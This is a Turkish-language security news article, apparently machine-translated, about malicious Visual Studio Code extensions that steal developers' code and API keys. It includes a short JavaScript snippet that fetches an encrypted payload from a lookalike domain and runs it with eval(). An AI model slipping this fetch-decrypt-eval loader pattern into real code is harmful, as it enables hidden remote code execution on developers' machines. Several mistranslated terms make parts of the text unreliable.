Siber güvenlik araştırmacıları, milyonlarca kurulumu toplu olarak toplayan kötü niyetli görsel stüdyo kodu uzantıları aracılığıyla yazılım geliştiricilerini hedefleyen rahatsız edici bir kampanya ortaya çıkardılar.
Meşru verimlilik araçları olarak maskelenen bu uzantılar, geliştiriciler programlama görevlerine odaklanırken gizlice kötü amaçlı kod yürütür.
Uzantılar, gerçek amaçlarını gizlerken tamamen işlevsel görünür, bu da onları sektördeki en güvenilir geliştirme ortamlarından birinde çalıştıkları için özellikle tehlikeli hale getirir.
.png
)
Kötü amaçlı yazılım kampanyası öncelikle JavaScript ve Python geliştiricilerini hedefledi ve uzantılar kod biçimlendirme, snippet üretimi ve otomasyon özellikleri gibi özellikler vaat etti.
Yüklendikten sonra, bu uzantılar yerel dosyalara, potansiyel olarak kaynak kodunu, API anahtarlarını ve geliştirme ortamlarında depolanan diğer hassas bilgileri aktarır.
Güvenlik uzmanları, uzantıların geliştirme sürecinde potansiyel olarak yazılımda arka planlar oluşturabileceği ve üretim sistemlerine güvenlik açıkları getirebileceği konusunda uyarıyor.
ExtensionTotal analist/araştırmacı Yuval Ronen, saldırının sofistike doğasının fırsatçı bilgisayar korsanlarından ziyade organize tehdit aktörleri önerdiğini belirtti.
Ronen, “Bu uzantılar sadece kimlik bilgilerini çalmıyor; kalıcılığı korumak ve potansiyel olarak konuşlandırılan uygulamalarda sömürülebilen ince güvenlik açıklarını tanıtmak için tasarlanmıştır.
Saldırı, geliştiricilerin çevrelerini binlerce topluluk tarafından oluşturulan araçlarla özelleştirmelerine olanak tanıyan Kod’un sağlam uzatma ekosisteminden yararlanıyor.
Microsoft güvenlik önlemlerini uygularken, uzantıların hacmi kapsamlı veterinerlik için zorluklar yaratır.
Kötü niyetli uzantıların birçoğu başlangıçta piyasaya temiz kodla girdi, ancak daha sonra güncellemeler yoluyla kötü niyetli işlevsellik getirdi.
Enfeksiyon mekanizması gelişmiş teknikleri ortaya çıkarır
Birincil enfeksiyon mekanizması, tespitten kaçınmak için çok aşamalı bir yaklaşım kullanır.
.webp)
Başlangıçta, uzatma, yapılandırma verileri olarak gizlenmiş şifreli bir yük yükü indirirken meşru işlevsellik yükler.
Bu yük daha sonra JavaScript’s kullanılarak şifrelenir ve yürütülür eval() işlev:-
const decrypt = (data, key) => {
// Decryption logic
return decryptedPayload;
};
const config = await fetch('https://legitimate-looking-domain.com/config.json');
const payload = decrypt(config.data, process.env.SOME_ENV_VAR);
eval(payload); // Executes malicious codeBu teknik, kötü amaçlı kod analiz araçlarını atlamasına izin verir, çünkü kötü amaçlı kod asla doğrudan uzantının kaynağında görünmez.
Uzantılar ayrıca, yüklerini dağıtmadan önce hata ayıklama ortamlarını ve güvenlik araçlarını kontrol ederek sofistike anti-analiz yetenekleri gösterir.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free